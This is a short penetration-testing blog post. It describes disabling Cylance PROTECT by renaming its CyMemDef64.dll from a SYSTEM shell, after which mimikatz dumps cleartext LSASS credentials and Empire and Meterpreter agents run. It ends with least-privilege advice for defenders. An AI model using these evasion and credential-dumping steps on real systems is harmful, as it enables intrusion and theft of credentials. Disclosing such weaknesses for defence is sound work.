During a penetration test, I had encountered some issues with Cylance PROTECT snagging a lot of my tooling (both public and private). After a bit of research and some client misconfiguration elsewhere, I was able to find a way to disable Cylance PROTECT.
I will state that the method I’m using isn’t all that novel and is most likely a known issue to many folks both inside and out of Cylance.
During my quest for Domain Admin, I had obtained Local Administrative rights to several machines within my target environment. Cylance PROTECT was not stopping me from running things like https://github.com/Genetic-Malware/Ebowla from running malware. However, it was preventing mimikatz from accessing LSASS.
I had tried to:
- stop the Cylance service (both as an LA ad NT SYSTEM) directly and was denied.
- kill the Cylance PROTECT process outright.
- run CyDuck https://github.com/xorrior/Random-CSharpTools/tree/master/CyDuck. Cylance appears to have a signature for this tool and various levels of obfuscation either wasn’t working or was getting caught.
I decided to dig into xorrior’s research a bit further https://www.xorrior.com/You-Have-The-Right-to-Remain-Cylance/ and found some of his knowledge on the subject interesting:
Cylance also utilizes a filter driver that is responsible for injecting the memory exploitation defense library (CyMemDef) into every new process.
It was then that I decided to take an alternate path and decided to manually manipulate the CyMemDef.dll/CyMemDef64.dll files directly to see if that would disable/break the CylanceSvc temporarily for the assessment.
- With Local Admin access, I used PsExec64.exe to spawn a shell as NT SYSTEM AUTHORITY
- I renamed C:\Program Files\Cylance\Desktop\CyMemDef64.dll to C:\Program Files\Cylance\Desktop\CyMemDef64.dll.bak
As soon as the .dll was renamed I was able to leverage mimikatz to dump cleartext credentials from LSASS. I was also able to run vanilla Empire and Meterpreter agents. This was all really cool, but I wanted to work on doing this process programatically. (No PoC available at the moment. Sorry!)
I don’t think that Cylance is directly at fault here, but I wonder if they could develop some solution to the problem.
What organizations that use Cylance will really have to do is follow industry standard best practicies.
Practice and enforce least privilege for their users, and remove Local Administrative rights from Domain Users/non-administrative accounts.